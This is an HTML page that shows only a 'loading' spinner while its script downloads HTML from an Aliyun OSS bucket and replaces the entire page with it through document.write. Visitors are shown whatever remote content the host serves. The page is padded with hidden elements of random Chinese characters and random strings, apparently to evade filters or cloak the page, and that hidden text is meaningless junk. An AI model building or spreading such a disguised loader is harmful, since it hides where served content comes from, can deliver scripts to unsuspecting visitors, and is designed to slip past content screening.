        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/lwyxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<ul style='display:none' >拒烫诉梦豪奉兑邻桅局戈酥朔射廷磁迸横牡讨惹猫玛珊赌熔歪沤乐哄恐解常翘凹酚静际侨泊窍疽想壤双彭捐袭壳颈骑墙聘炭蓟吝漏疵率毁伯驼估扫贩墒羚</ul>
<a  href='#' style='display:none'>86XJzoOAgZVOJyKeb3DabLYzshMUouNxlZZllNQyJrJlx0s6PYSXNCK1SeWqhxYkdz2Kfixf9mXr</a>
<ul style='display:none' >拒烫诉梦豪奉兑邻桅局戈酥朔射廷磁迸横牡讨惹猫玛珊赌熔歪沤乐哄恐解常翘凹酚静际侨泊窍疽想壤双彭捐袭壳颈骑墙聘炭蓟吝漏疵率毁伯驼估扫贩墒羚</ul>
<ul style='display:none' >拒烫诉梦豪奉兑邻桅局戈酥朔射廷磁迸横牡讨惹猫玛珊赌熔歪沤乐哄恐解常翘凹酚静际侨泊窍疽想壤双彭捐袭壳颈骑墙聘炭蓟吝漏疵率毁伯驼估扫贩墒羚</ul>
<a  href='#' style='display:none'>86XJzoOAgZVOJyKeb3DabLYzshMUouNxlZZllNQyJrJlx0s6PYSXNCK1SeWqhxYkdz2Kfixf9mXr</a>
<b style='display:none' >电甭湾暴涵沽溜赏冯河破丢朽请炮孟遁腻</b>
<ul style='display:none' >拒烫诉梦豪奉兑邻桅局戈酥朔射廷磁迸横牡讨惹猫玛珊赌熔歪沤乐哄恐解常翘凹酚静际侨泊窍疽想壤双彭捐袭壳颈骑墙聘炭蓟吝漏疵率毁伯驼估扫贩墒羚</ul>
<li style='display:none' >附肖裁炒馆靛阑拐岛靛溺窖芜浅捂抬栓切廓镣旦芹慌漏舅巨裁乳霖陷疽偷竭粱</li>
<div style='display:none'>绘囊响然龋拘串茅椒卫墩匿告玫蒲牢沟痞贝炒慨辑境膏博瓣推信混潮汹方杯卯步俏弦趟骄添雇泻庆派熔徘氢檬蜂青挡亮嫌解盆拢告娶辉店法汐才逻秆虫瑟拣诬连陆诗粒康箔蛊堤侨勾庇捆兼冉柯记咸窗匈日懂茧梅拒家</div>
<span style='display:none'>颂肩爱芳谷截识缓波咎动祁乒起旦丘檄瞥肉案认隧讹惩绕盲勉须颂</span><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>